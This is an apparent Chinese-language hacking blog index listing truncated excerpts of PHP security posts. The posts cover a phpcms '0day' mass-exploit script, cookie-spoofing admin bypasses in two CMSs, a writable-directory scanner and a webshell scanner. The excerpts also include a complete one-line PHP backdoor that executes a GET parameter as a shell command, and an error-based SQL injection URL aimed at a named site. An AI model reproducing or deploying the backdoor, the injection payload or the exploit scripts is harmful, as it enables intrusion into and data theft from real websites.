win2008下如何快速安装PHP,并做好安全设置

虽然现在跑PHP的最佳选择还是Linux,但是随着Windows Server 2008 的出现,前者和后者的差距已经大大缩小,对于不懂Linux操作的朋友,可以丢弃Windows 2003 Server了,选择更好的Windows Server 2008。   在Windows Server 2008下配置PHP环境特别的快,只需要鼠标点点就可以了。   1,下载PHP5.2...

- 阅读全文 -

phpcms-exp 0day

<?php error_reporting(E_ERROR); set_time_limit(0); $keyword=’inurl:about/joinus’ ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastpage ; $i++ ){ $arra...

- 阅读全文 -

搜一次 cms php 通杀

洞文件 admin 目录下的 admin_loginstate.php 看代码 if(empty($_COOKIE['S_AdminID'])){ echo "<script>window.location='admin_login.php'</script>"; exit; } elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_Adm...

- 阅读全文 -

一个官方没有公布的php秘籍,可用作后门

发现这个也是巧合,我就直接说了吧 <?php //t.php $test = $_GET['r']; echo `$test`; ?> 大家看看这个代码有木有问题? 这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 信息安全团队 而且又不是单引号,这个就是关键所...

- 阅读全文 -

php 源码审计之 cookies 欺骗

ebycms是一套手机音乐cms系统 直接上代码 admin目录下的in.php <?php require_once('L:/wamp/www//fern.php'); Annotation("L:\wamp\www\eby\admin\in.php_0"); define(EBY_IN,TRUE); define('ADMIN_ROOT', str_replace("\","/",dir...

- 阅读全文 -

PHP遍历单目录可写权限脚本

PHP遍历单目录可写权限脚本 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <htm...

- 阅读全文 -

php+mysql高级爆错注入经测算有效

之前想找个测试 没想到这有 可以测试下做个记录而已 http://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0...

- 阅读全文 -

PHP Web 木马扫描器代码

scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net , 转载请注明t00ls */ /* [...

- 阅读全文 -